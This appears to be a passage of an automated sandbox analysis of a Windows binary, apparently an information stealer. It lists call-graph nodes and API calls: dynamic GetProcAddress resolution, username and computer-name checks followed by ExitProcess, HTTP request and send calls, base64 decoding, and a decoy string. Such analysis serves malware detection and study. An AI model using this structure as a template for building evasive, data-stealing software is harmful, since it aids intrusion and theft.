4030aa 26875->26876 26877 4045c0 34 API calls 26876->26877 26878 4030c3 26877->26878 26879 4045c0 34 API calls 26878->26879 26880 4030dc 26879->26880 26881 4045c0 34 API calls 26880->26881 26882 4030f5 26881->26882 26883 4045c0 34 API calls 26882->26883 26884 40310e 26883->26884 26885 4045c0 34 API calls 26884->26885 26886 403127 26885->26886 26887 4045c0 34 API calls 26886->26887 26888 403140 26887->26888 26889 4045c0 34 API calls 26888->26889 26890 403159 26889->26890 26891 4045c0 34 API calls 26890->26891 26892 403172 26891->26892 26893 4045c0 34 API calls 26892->26893 26894 40318b 26893->26894 26895 4045c0 34 API calls 26894->26895 26896 4031a4 26895->26896 26897 4045c0 34 API calls 26896->26897 26898 4031bd 26897->26898 26899 4045c0 34 API calls 26898->26899 26900 4031d6 26899->26900 26901 4045c0 34 API calls 26900->26901 26902 4031ef 26901->26902 26903 4045c0 34 API calls 26902->26903 26904 403208 26903->26904 26905 4045c0 34 API calls 26904->26905 26906 403221 26905->26906 26907 4045c0 34 API calls 26906->26907 26908 40323a 26907->26908 26909 4045c0 34 API calls 26908->26909 26910 403253 26909->26910 26911 4045c0 34 API calls 26910->26911 26912 40326c 26911->26912 26913 4045c0 34 API calls 26912->26913 26914 403285 26913->26914 26915 4045c0 34 API calls 26914->26915 26916 40329e 26915->26916 26917 4045c0 34 API calls 26916->26917 26918 4032b7 26917->26918 26919 4045c0 34 API calls 26918->26919 26920 4032d0 26919->26920 26921 4045c0 34 API calls 26920->26921 26922 4032e9 26921->26922 26923 4045c0 34 API calls 26922->26923 26924 403302 26923->26924 26925 4045c0 34 API calls 26924->26925 26926 40331b 26925->26926 26927 4045c0 34 API calls 26926->26927 26928 403334 26927->26928 26929 4045c0 34 API calls 26928->26929 26930 40334d 26929->26930 26931 4045c0 34 API calls 26930->26931 26932 403366 26931->26932 26933 4045c0 34 API calls 26932->26933 26934 40337f 26933->26934 26935 4045c0 34 API calls 26934->26935 26936 403398 26935->26936 26937 4045c0 34 API calls 26936->26937 26938 4033b1 26937->26938 26939 4045c0 34 API calls 26938->26939 26940 4033ca 26939->26940 26941 4045c0 34 API calls 26940->26941 26942 4033e3 26941->26942 26943 4045c0 34 API calls 26942->26943 26944 4033fc 26943->26944 26945 4045c0 34 API calls 26944->26945 26946 403415 26945->26946 26947 4045c0 34 API calls 26946->26947 26948 40342e 26947->26948 26949 4045c0 34 API calls 26948->26949 26950 403447 26949->26950 26951 4045c0 34 API calls 26950->26951 26952 403460 26951->26952 26953 4045c0 34 API calls 26952->26953 26954 403479 26953->26954 26955 4045c0 34 API calls 26954->26955 26956 403492 26955->26956 26957 4045c0 34 API calls 26956->26957 26958 4034ab 26957->26958 26959 4045c0 34 API calls 26958->26959 26960 4034c4 26959->26960 26961 4045c0 34 API calls 26960->26961 26962 4034dd 26961->26962 26963 4045c0 34 API calls 26962->26963 26964 4034f6 26963->26964 26965 4045c0 34 API calls 26964->26965 26966 40350f 26965->26966 26967 4045c0 34 API calls 26966->26967 26968 403528 26967->26968 26969 4045c0 34 API calls 26968->26969 26970 403541 26969->26970 26971 4045c0 34 API calls 26970->26971 26972 40355a 26971->26972 26973 4045c0 34 API calls 26972->26973 26974 403573 26973->26974 26975 4045c0 34 API calls 26974->26975 26976 40358c 26975->26976 26977 4045c0 34 API calls 26976->26977 26978 4035a5 26977->26978 26979 4045c0 34 API calls 26978->26979 26980 4035be 26979->26980 26981 4045c0 34 API calls 26980->26981 26982 4035d7 26981->26982 26983 4045c0 34 API calls 26982->26983 26984 4035f0 26983->26984 26985 4045c0 34 API calls 26984->26985 26986 403609 26985->26986 26987 4045c0 34 API calls 26986->26987 26988 403622 26987->26988 26989 4045c0 34 API calls 26988->26989 26990 40363b 26989->26990 26991 4045c0 34 API calls 26990->26991 26992 403654 26991->26992 26993 4045c0 34 API calls 26992->26993 26994 40366d 26993->26994 26995 4045c0 34 API calls 26994->26995 26996 403686 26995->26996 26997 4045c0 34 API calls 26996->26997 26998 40369f 26997->26998 26999 4045c0 34 API calls 26998->26999 27000 4036b8 26999->27000 27001 4045c0 34 API calls 27000->27001 27002 4036d1 27001->27002 27003 4045c0 34 API calls 27002->27003 27004 4036ea 27003->27004 27005 4045c0 34 API calls 27004->27005 27006 403703 27005->27006 27007 4045c0 34 API calls 27006->27007 27008 40371c 27007->27008 27009 4045c0 34 API calls 27008->27009 27010 403735 27009->27010 27011 4045c0 34 API calls 27010->27011 27012 40374e 27011->27012 27013 4045c0 34 API calls 27012->27013 27014 403767 27013->27014 27015 4045c0 34 API calls 27014->27015 27016 403780 27015->27016 27017 4045c0 34 API calls 27016->27017 27018 403799 27017->27018 27019 4045c0 34 API calls 27018->27019 27020 4037b2 27019->27020 27021 4045c0 34 API calls 27020->27021 27022 4037cb 27021->27022 27023 4045c0 34 API calls 27022->27023 27024 4037e4 27023->27024 27025 4045c0 34 API calls 27024->27025 27026 4037fd 27025->27026 27027 4045c0 34 API calls 27026->27027 27028 403816 27027->27028 27029 4045c0 34 API calls 27028->27029 27030 40382f 27029->27030 27031 4045c0 34 API calls 27030->27031 27032 403848 27031->27032 27033 4045c0 34 API calls 27032->27033 27034 403861 27033->27034 27035 4045c0 34 API calls 27034->27035 27036 40387a 27035->27036 27037 4045c0 34 API calls 27036->27037 27038 403893 27037->27038 27039 4045c0 34 API calls 27038->27039 27040 4038ac 27039->27040 27041 4045c0 34 API calls 27040->27041 27042 4038c5 27041->27042 27043 4045c0 34 API calls 27042->27043 27044 4038de 27043->27044 27045 4045c0 34 API calls 27044->27045 27046 4038f7 27045->27046 27047 4045c0 34 API calls 27046->27047 27048 403910 27047->27048 27049 4045c0 34 API calls 27048->27049 27050 403929 27049->27050 27051 4045c0 34 API calls 27050->27051 27052 403942 27051->27052 27053 4045c0 34 API calls 27052->27053 27054 40395b 27053->27054 27055 4045c0 34 API calls 27054->27055 27056 403974 27055->27056 27057 4045c0 34 API calls 27056->27057 27058 40398d 27057->27058 27059 4045c0 34 API calls 27058->27059 27060 4039a6 27059->27060 27061 4045c0 34 API calls 27060->27061 27062 4039bf 27061->27062 27063 4045c0 34 API calls 27062->27063 27064 4039d8 27063->27064 27065 4045c0 34 API calls 27064->27065 27066 4039f1 27065->27066 27067 4045c0 34 API calls 27066->27067 27068 403a0a 27067->27068 27069 4045c0 34 API calls 27068->27069 27070 403a23 27069->27070 27071 4045c0 34 API calls 27070->27071 27072 403a3c 27071->27072 27073 4045c0 34 API calls 27072->27073 27074 403a55 27073->27074 27075 4045c0 34 API calls 27074->27075 27076 403a6e 27075->27076 27077 4045c0 34 API calls 27076->27077 27078 403a87 27077->27078 27079 4045c0 34 API calls 27078->27079 27080 403aa0 27079->27080 27081 4045c0 34 API calls 27080->27081 27082 403ab9 27081->27082 27083 4045c0 34 API calls 27082->27083 27084 403ad2 27083->27084 27085 4045c0 34 API calls 27084->27085 27086 403aeb 27085->27086 27087 4045c0 34 API calls 27086->27087 27088 403b04 27087->27088 27089 4045c0 34 API calls 27088->27089 27090 403b1d 27089->27090 27091 4045c0 34 API calls 27090->27091 27092 403b36 27091->27092 27093 4045c0 34 API calls 27092->27093 27094 403b4f 27093->27094 27095 4045c0 34 API calls 27094->27095 27096 403b68 27095->27096 27097 4045c0 34 API calls 27096->27097 27098 403b81 27097->27098 27099 4045c0 34 API calls 27098->27099 27100 403b9a 27099->27100 27101 4045c0 34 API calls 27100->27101 27102 403bb3 27101->27102 27103 4045c0 34 API calls 27102->27103 27104 403bcc 27103->27104 27105 4045c0 34 API calls 27104->27105 27106 403be5 27105->27106 27107 4045c0 34 API calls 27106->27107 27108 403bfe 27107->27108 27109 4045c0 34 API calls 27108->27109 27110 403c17 27109->27110 27111 4045c0 34 API calls 27110->27111 27112 403c30 27111->27112 27113 4045c0 34 API calls 27112->27113 27114 403c49 27113->27114 27115 4045c0 34 API calls 27114->27115 27116 403c62 27115->27116 27117 4045c0 34 API calls 27116->27117 27118 403c7b 27117->27118 27119 4045c0 34 API calls 27118->27119 27120 403c94 27119->27120 27121 4045c0 34 API calls 27120->27121 27122 403cad 27121->27122 27123 4045c0 34 API calls 27122->27123 27124 403cc6 27123->27124 27125 4045c0 34 API calls 27124->27125 27126 403cdf 27125->27126 27127 4045c0 34 API calls 27126->27127 27128 403cf8 27127->27128 27129 4045c0 34 API calls 27128->27129 27130 403d11 27129->27130 27131 4045c0 34 API calls 27130->27131 27132 403d2a 27131->27132 27133 4045c0 34 API calls 27132->27133 27134 403d43 27133->27134 27135 4045c0 34 API calls 27134->27135 27136 403d5c 27135->27136 27137 4045c0 34 API calls 27136->27137 27138 403d75 27137->27138 27139 4045c0 34 API calls 27138->27139 27140 403d8e 27139->27140 27141 4045c0 34 API calls 27140->27141 27142 403da7 27141->27142 27143 4045c0 34 API calls 27142->27143 27144 403dc0 27143->27144 27145 4045c0 34 API calls 27144->27145 27146 403dd9 27145->27146 27147 4045c0 34 API calls 27146->27147 27148 403df2 27147->27148 27149 4045c0 34 API calls 27148->27149 27150 403e0b 27149->27150 27151 4045c0 34 API calls 27150->27151 27152 403e24 27151->27152 27153 4045c0 34 API calls 27152->27153 27154 403e3d 27153->27154 27155 4045c0 34 API calls 27154->27155 27156 403e56 27155->27156 27157 4045c0 34 API calls 27156->27157 27158 403e6f 27157->27158 27159 4045c0 34 API calls 27158->27159 27160 403e88 27159->27160 27161 4045c0 34 API calls 27160->27161 27162 403ea1 27161->27162 27163 4045c0 34 API calls 27162->27163 27164 403eba 27163->27164 27165 4045c0 34 API calls 27164->27165 27166 403ed3 27165->27166 27167 4045c0 34 API calls 27166->27167 27168 403eec 27167->27168 27169 4045c0 34 API calls 27168->27169 27170 403f05 27169->27170 27171 4045c0 34 API calls 27170->27171 27172 403f1e 27171->27172 27173 4045c0 34 API calls 27172->27173 27174 403f37 27173->27174 27175 4045c0 34 API calls 27174->27175 27176 403f50 27175->27176 27177 4045c0 34 API calls 27176->27177 27178 403f69 27177->27178 27179 4045c0 34 API calls 27178->27179 27180 403f82 27179->27180 27181 4045c0 34 API calls 27180->27181 27182 403f9b 27181->27182 27183 4045c0 34 API calls 27182->27183 27184 403fb4 27183->27184 27185 4045c0 34 API calls 27184->27185 27186 403fcd 27185->27186 27187 4045c0 34 API calls 27186->27187 27188 403fe6 27187->27188 27189 4045c0 34 API calls 27188->27189 27190 403fff 27189->27190 27191 4045c0 34 API calls 27190->27191 27192 404018 27191->27192 27193 4045c0 34 API calls 27192->27193 27194 404031 27193->27194 27195 4045c0 34 API calls 27194->27195 27196 40404a 27195->27196 27197 4045c0 34 API calls 27196->27197 27198 404063 27197->27198 27199 4045c0 34 API calls 27198->27199 27200 40407c 27199->27200 27201 4045c0 34 API calls 27200->27201 27202 404095 27201->27202 27203 4045c0 34 API calls 27202->27203 27204 4040ae 27203->27204 27205 4045c0 34 API calls 27204->27205 27206 4040c7 27205->27206 27207 4045c0 34 API calls 27206->27207 27208 4040e0 27207->27208 27209 4045c0 34 API calls 27208->27209 27210 4040f9 27209->27210 27211 4045c0 34 API calls 27210->27211 27212 404112 27211->27212 27213 4045c0 34 API calls 27212->27213 27214 40412b 27213->27214 27215 4045c0 34 API calls 27214->27215 27216 404144 27215->27216 27217 4045c0 34 API calls 27216->27217 27218 40415d 27217->27218 27219 4045c0 34 API calls 27218->27219 27220 404176 27219->27220 27221 4045c0 34 API calls 27220->27221 27222 40418f 27221->27222 27223 4045c0 34 API calls 27222->27223 27224 4041a8 27223->27224 27225 4045c0 34 API calls 27224->27225 27226 4041c1 27225->27226 27227 4045c0 34 API calls 27226->27227 27228 4041da 27227->27228 27229 4045c0 34 API calls 27228->27229 27230 4041f3 27229->27230 27231 4045c0 34 API calls 27230->27231 27232 40420c 27231->27232 27233 4045c0 34 API calls 27232->27233 27234 404225 27233->27234 27235 4045c0 34 API calls 27234->27235 27236 40423e 27235->27236 27237 4045c0 34 API calls 27236->27237 27238 404257 27237->27238 27239 4045c0 34 API calls 27238->27239 27240 404270 27239->27240 27241 4045c0 34 API calls 27240->27241 27242 404289 27241->27242 27243 4045c0 34 API calls 27242->27243 27244 4042a2 27243->27244 27245 4045c0 34 API calls 27244->27245 27246 4042bb 27245->27246 27247 4045c0 34 API calls 27246->27247 27248 4042d4 27247->27248 27249 4045c0 34 API calls 27248->27249 27250 4042ed 27249->27250 27251 4045c0 34 API calls 27250->27251 27252 404306 27251->27252 27253 4045c0 34 API calls 27252->27253 27254 40431f 27253->27254 27255 4045c0 34 API calls 27254->27255 27256 404338 27255->27256 27257 4045c0 34 API calls 27256->27257 27258 404351 27257->27258 27259 4045c0 34 API calls 27258->27259 27260 40436a 27259->27260 27261 4045c0 34 API calls 27260->27261 27262 404383 27261->27262 27263 4045c0 34 API calls 27262->27263 27264 40439c 27263->27264 27265 4045c0 34 API calls 27264->27265 27266 4043b5 27265->27266 27267 4045c0 34 API calls 27266->27267 27268 4043ce 27267->27268 27269 4045c0 34 API calls 27268->27269 27270 4043e7 27269->27270 27271 4045c0 34 API calls 27270->27271 27272 404400 27271->27272 27273 4045c0 34 API calls 27272->27273 27274 404419 27273->27274 27275 4045c0 34 API calls 27274->27275 27276 404432 27275->27276 27277 4045c0 34 API calls 27276->27277 27278 40444b 27277->27278 27279 4045c0 34 API calls 27278->27279 27280 404464 27279->27280 27281 4045c0 34 API calls 27280->27281 27282 40447d 27281->27282 27283 4045c0 34 API calls 27282->27283 27284 404496 27283->27284 27285 4045c0 34 API calls 27284->27285 27286 4044af 27285->27286 27287 4045c0 34 API calls 27286->27287 27288 4044c8 27287->27288 27289 4045c0 34 API calls 27288->27289 27290 4044e1 27289->27290 27291 4045c0 34 API calls 27290->27291 27292 4044fa 27291->27292 27293 4045c0 34 API calls 27292->27293 27294 404513 27293->27294 27295 4045c0 34 API calls 27294->27295 27296 40452c 27295->27296 27297 4045c0 34 API calls 27296->27297 27298 404545 27297->27298 27299 4045c0 34 API calls 27298->27299 27300 40455e 27299->27300 27301 4045c0 34 API calls 27300->27301 27302 404577 27301->27302 27303 4045c0 34 API calls 27302->27303 27304 404590 27303->27304 27305 4045c0 34 API calls 27304->27305 27306 4045a9 27305->27306 27307 419c10 27306->27307 27308 419c20 43 API calls 27307->27308 27309 41a036 8 API calls 27307->27309 27308->27309 27310 41a146 27309->27310 27311 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27309->27311 27312 41a153 8 API calls 27310->27312 27313 41a216 27310->27313 27311->27310 27312->27313 27314 41a298 27313->27314 27315 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27313->27315 27316 41a2a5 6 API calls 27314->27316 27317 41a337 27314->27317 27315->27314 27316->27317 27318 41a344 9 API calls 27317->27318 27319 41a41f 27317->27319 27318->27319 27320 41a4a2 27319->27320 27321 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27319->27321 27322 41a4ab GetProcAddress GetProcAddress 27320->27322 27323 41a4dc 27320->27323 27321->27320 27322->27323 27324 41a515 27323->27324 27325 41a4e5 GetProcAddress GetProcAddress 27323->27325 27326 41a612 27324->27326 27327 41a522 10 API calls 27324->27327 27325->27324 27328 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27326->27328 27329 41a67d 27326->27329 27327->27326 27328->27329 27330 41a686 GetProcAddress 27329->27330 27331 41a69e 27329->27331 27330->27331 27332 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27331->27332 27333 415ca3 27331->27333 27332->27333 27334 401590 27333->27334 27609 401670 27334->27609 27337 41a7a0 lstrcpy 27338 4015b5 27337->27338 27339 41a7a0 lstrcpy 27338->27339 27340 4015c7 27339->27340 27341 41a7a0 lstrcpy 27340->27341 27342 4015d9 27341->27342 27343 41a7a0 lstrcpy 27342->27343 27344 401663 27343->27344 27345 415510 27344->27345 27346 415521 27345->27346 27347 41a820 2 API calls 27346->27347 27348 41552e 27347->27348 27349 41a820 2 API calls 27348->27349 27350 41553b 27349->27350 27351 41a820 2 API calls 27350->27351 27352 415548 27351->27352 27353 41a740 lstrcpy 27352->27353 27354 415555 27353->27354 27355 41a740 lstrcpy 27354->27355 27356 415562 27355->27356 27357 41a740 lstrcpy 27356->27357 27358 41556f 27357->27358 27359 41a740 lstrcpy 27358->27359 27379 41557c 27359->27379 27360 4151f0 23 API calls 27360->27379 27361 415643 StrCmpCA 27361->27379 27362 4156a0 StrCmpCA 27363 4157dc 27362->27363 27362->27379 27364 41a8a0 lstrcpy 27363->27364 27365 4157e8 27364->27365 27366 41a820 2 API calls 27365->27366 27369 4157f6 27366->27369 27367 41a740 lstrcpy 27367->27379 27368 41a820 lstrlenA lstrcpy 27368->27379 27371 41a820 2 API calls 27369->27371 27370 415856 StrCmpCA 27372 415991 27370->27372 27370->27379 27375 415805 27371->27375 27374 41a8a0 lstrcpy 27372->27374 27373 41a8a0 lstrcpy 27373->27379 27376 41599d 27374->27376 27377 401670 lstrcpy 27375->27377 27378 41a820 2 API calls 27376->27378 27399 415811 27377->27399 27380 4159ab 27378->27380 27379->27360 27379->27361 27379->27362 27379->27367 27379->27368 27379->27370 27379->27373 27381 415a0b StrCmpCA 27379->27381 27389 401590 lstrcpy 27379->27389 27392 4152c0 29 API calls 27379->27392 27395 41578a StrCmpCA 27379->27395 27397 41593f StrCmpCA 27379->27397 27398 41a7a0 lstrcpy 27379->27398 27382 41a820 2 API calls 27380->27382 27383 415a16 Sleep 27381->27383 27384 415a28 27381->27384 27385 4159ba 27382->27385 27383->27379 27386 41a8a0 lstrcpy 27384->27386 27387 401670 lstrcpy 27385->27387 27388 415a34 27386->27388 27387->27399 27390 41a820 2 API calls 27388->27390 27389->27379 27391 415a43 27390->27391 27393 41a820 2 API calls 27391->27393 27392->27379 27394 415a52 27393->27394 27396 401670 lstrcpy 27394->27396 27395->27379 27396->27399 27397->27379 27398->27379 27399->26453 27401 417553 GetVolumeInformationA 27400->27401 27402 41754c 27400->27402 27407 417591 27401->27407 27402->27401 27403 4175fc GetProcessHeap HeapAlloc 27404 417619 27403->27404 27405 417628 wsprintfA 27403->27405 27408 41a740 lstrcpy 27404->27408 27406 41a740 lstrcpy 27405->27406 27409 415da7 27406->27409 27407->27403 27408->27409 27409->26474 27411 41a7a0 lstrcpy 27410->27411 27412 404899 27411->27412 27618 4047b0 27412->27618 27414 4048a5 27415 41a740 lstrcpy 27414->27415 27416 4048d7 27415->27416 27417 41a740 lstrcpy 27416->27417 27418 4048e4 27417->27418 27419 41a740 lstrcpy 27418->27419 27420 4048f1 27419->27420 27421 41a740 lstrcpy 27420->27421 27422 4048fe 27421->27422 27423 41a740 lstrcpy 27422->27423 27424 40490b InternetOpenA StrCmpCA 27423->27424 27425 404944 27424->27425 27426 404955 27425->27426 27427 404ecb InternetCloseHandle 27425->27427 27631 418b60 GetSystemTime lstrcpy lstrcpy 27426->27631 27429 404ee8 27427->27429 27626 409ac0 CryptStringToBinaryA 27429->27626 27430 404963 27632 41a920 lstrcpy lstrcpy lstrcatA 27430->27632 27434 404976 27435 41a8a0 lstrcpy 27434->27435 27440 40497f 27435->27440 27436 41a820 2 API calls 27437 404f05 27436->27437 27438 41a9b0 4 API calls 27437->27438 27441 404f1b 27438->27441 27439 404f27 ctype 27442 41a7a0 lstrcpy 27439->27442 27444 41a9b0 4 API calls 27440->27444 27443 41a8a0 lstrcpy 27441->27443 27455 404f57 27442->27455 27443->27439 27445 4049a9 27444->27445 27446 41a8a0 lstrcpy 27445->27446 27447 4049b2 27446->27447 27448 41a9b0 4 API calls 27447->27448 27449 4049d1 27448->27449 27450 41a8a0 lstrcpy 27449->27450 27451 4049da 27450->27451 27633 41a920 lstrcpy lstrcpy lstrcatA 27451->27633 27453 4049f8 27454 41a8a0 lstrcpy 27453->27454 27456 404a01 27454->27456 27455->26477 27457 41a9b0 4 API calls 27456->27457 27458 404a20 27457->27458 27459 41a8a0 lstrcpy 27458->27459 27460 404a29 27459->27460 27461 41a9b0 4 API calls 27460->27461 27462 404a48 27461->27462 27463 41a8a0 lstrcpy 27462->27463 27464 404a51 27463->27464 27465 41a9b0 4 API calls 27464->27465 27466 404a7d 27465->27466 27634 41a920 lstrcpy lstrcpy lstrcatA 27466->27634 27468 404a84 27469 41a8a0 lstrcpy 27468->27469 27470 404a8d 27469->27470 27471 404aa3 InternetConnectA 27470->27471 27471->27427 27472 404ad3 HttpOpenRequestA 27471->27472 27474 404b28 27472->27474 27475 404ebe InternetCloseHandle 27472->27475 27476 41a9b0 4 API calls 27474->27476 27475->27427 27477 404b3c 27476->27477 27478 41a8a0 lstrcpy 27477->27478 27479 404b45 27478->27479 27635 41a920 lstrcpy lstrcpy lstrcatA 27479->27635 27481 404b63 27482 41a8a0 lstrcpy 27481->27482 27483 404b6c 27482->27483 27484 41a9b0 4 API calls 27483->27484 27485 404b8b 27484->27485 27486 41a8a0 lstrcpy 27485->27486 27487 404b94 27486->27487 27488 41a9b0 4 API calls 27487->27488 27489 404bb5 27488->27489 27490 41a8a0 lstrcpy 27489->27490 27491 404bbe 27490->27491 27492 41a9b0 4 API calls 27491->27492 27493 404bde 27492->27493 27494 41a8a0 lstrcpy 27493->27494 27495 404be7 27494->27495 27496 41a9b0 4 API calls 27495->27496 27497 404c06 27496->27497 27498 41a8a0 lstrcpy 27497->27498 27499 404c0f 27498->27499 27636 41a920 lstrcpy lstrcpy lstrcatA 27499->27636 27501 404c2d 27502 41a8a0 lstrcpy 27501->27502 27503 404c36 27502->27503 27504 41a9b0 4 API calls 27503->27504 27505 404c55 27504->27505 27506 41a8a0 lstrcpy 27505->27506 27507 404c5e 27506->27507 27508 41a9b0 4 API calls 27507->27508 27509 404c7d 27508->27509 27510 41a8a0 lstrcpy 27509->27510 27511 404c86 27510->27511 27637 41a920 lstrcpy lstrcpy lstrcatA 27511->27637 27513 404ca4 27514 41a8a0 lstrcpy 27513->27514 27515 404cad 27514->27515 27516 41a9b0 4 API calls 27515->27516 27517 404ccc 27516->27517 27518 41a8a0 lstrcpy 27517->27518 27519 404cd5 27518->27519 27520 41a9b0 4 API calls 27519->27520 27521 404cf6 27520->27521 27522 41a8a0 lstrcpy 27521->27522 27523 404cff 27522->27523 27524 41a9b0 4 API calls 27523->27524 27525 404d1f 27524->27525 27526 41a8a0 lstrcpy 27525->27526 27527 404d28 27526->27527 27528 41a9b0 4 API calls 27527->27528 27529 404d47 27528->27529 27530 41a8a0 lstrcpy 27529->27530 27531 404d50 27530->27531 27638 41a920 lstrcpy lstrcpy lstrcatA 27531->27638 27533 404d6e 27534 41a8a0 lstrcpy 27533->27534 27535 404d77 27534->27535 27536 41a740 lstrcpy 27535->27536 27537 404d92 27536->27537 27639 41a920 lstrcpy lstrcpy lstrcatA 27537->27639 27539 404db3 27640 41a920 lstrcpy lstrcpy lstrcatA 27539->27640 27541 404dba 27542 41a8a0 lstrcpy 27541->27542 27543 404dc6 27542->27543 27544 404de7 lstrlenA 27543->27544 27545 404dfa 27544->27545 27546 404e03 lstrlenA 27545->27546 27641 41aad0 27546->27641 27548 404e13 HttpSendRequestA 27549 404e32 InternetReadFile 27548->27549 27550 404e67 InternetCloseHandle 27549->27550 27555 404e5e 27549->27555 27553 41a800 27550->27553 27552 41a9b0 4 API calls 27552->27555 27553->27475 27554 41a8a0 lstrcpy 27554->27555 27555->27549 27555->27550 27555->27552 27555->27554 27646 41aad0 27556->27646 27558 4117c4 StrCmpCA 27559 4117d7 27558->27559 27560 4117cf ExitProcess 27558->27560 27561 4117e7 strtok_s 27559->27561 27575 4117f4 27561->27575 27562 4119c2 27562->26479 27563 41199e strtok_s 27563->27575 27564 4118ad StrCmpCA 27564->27575 27565 4118cf StrCmpCA 27565->27575 27566 4118f1 StrCmpCA 27566->27575 27567 411951 StrCmpCA 27567->27575 27568 411970 StrCmpCA 27568->27575 27569 411913 StrCmpCA 27569->27575 27570 411932 StrCmpCA 27570->27575 27571 41185d StrCmpCA 27571->27575 27572 41187f StrCmpCA 27572->27575 27573 41a820 lstrlenA lstrcpy 27573->27575 27574 41a820 2 API calls 27574->27563 27575->27562 27575->27563 27575->27564 27575->27565 27575->27566 27575->27567 27575->27568 27575->27569 27575->27570 27575->27571 27575->27572 27575->27573 27575->27574 27576->26485 27577->26487 27578->26493 27579->26495 27580->26501 27581->26503 27582->26507 27583->26511 27584->26515 27585->26521 27586->26523 27587->26527 27588->26541 27589->26545 27590->26544 27591->26540 27592->26544 27593->26562 27594->26547 27595->26551 27596->26552 27597->26558 27598->26559 27599->26565 27600->26572 27601->26574 27602->26598 27603->26601 27604->26602 27605->26597 27606->26602 27607->26611 27610 41a7a0 lstrcpy 27609->27610 27611 401683 27610->27611 27612 41a7a0 lstrcpy 27611->27612 27613 401695 27612->27613 27614 41a7a0 lstrcpy 27613->27614 27615 4016a7 27614->27615 27616 41a7a0 lstrcpy 27615->27616 27617 4015a3 27616->27617 27617->27337 27642 401030 27618->27642 27622 404838 lstrlenA 27645 41aad0 27622->27645 27624 404848 InternetCrackUrlA 27625 404867 27624->27625 27625->27414 27627 409af9 LocalAlloc 27626->27627 27628 404eee 27626->27628 27627->27628 27629 409b14 CryptStringToBinaryA 27627->27629 27628->27436 27628->27439 27629->27628 27630 409b39 LocalFree 27629->27630 27630->27628 27631->27430 27632->27434 27633->27453 27634->27468 27635->27481 27636->27501 27637->27513 27638->27533 27639->27539 27640->27541 27641->27548 27643 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27642->27643 27644 41aad0 27643->27644 27644->27622 27645->27624 27646->27558 27752 416ab1 902 API calls 27719 4069f3 7 API calls 27789 30304b7 88 API calls 27790 3030cb6 30 API calls 27722 3026ebc VirtualProtect 27754 41cafe 219 API calls 4 library calls 27696 30313c7 strtok_s strtok_s 26199 401190 26206 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26199->26206 26201 40119e 26202 4011cc 26201->26202 26208 417850 GetProcessHeap HeapAlloc GetUserNameA 26201->26208 26204 4011b7 26204->26202 26205 4011c4 ExitProcess 26204->26205 26207 417939 26206->26207 26207->26201 26209 4178c3 26208->26209 26209->26204 27796 30330d0 9 API calls 27799 3033823 9 API calls 27757 41ce9f 69 API calls __amsg_exit 27699 4088a4 RaiseException task __CxxThrowException@8 27700 4180a5 GetProcessHeap HeapFree 27758 30319e7 StrCmpCA ExitProcess strtok_s StrCmpCA strtok_s 27759 30335e4 9 API calls 27801 303cce9 162 API calls ___crtLCMapStringA 27731 41b9b0 RtlUnwind 27802 30330f9 7 API calls

                                            Control-flow Graph

                                            APIs
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                            • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                            • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
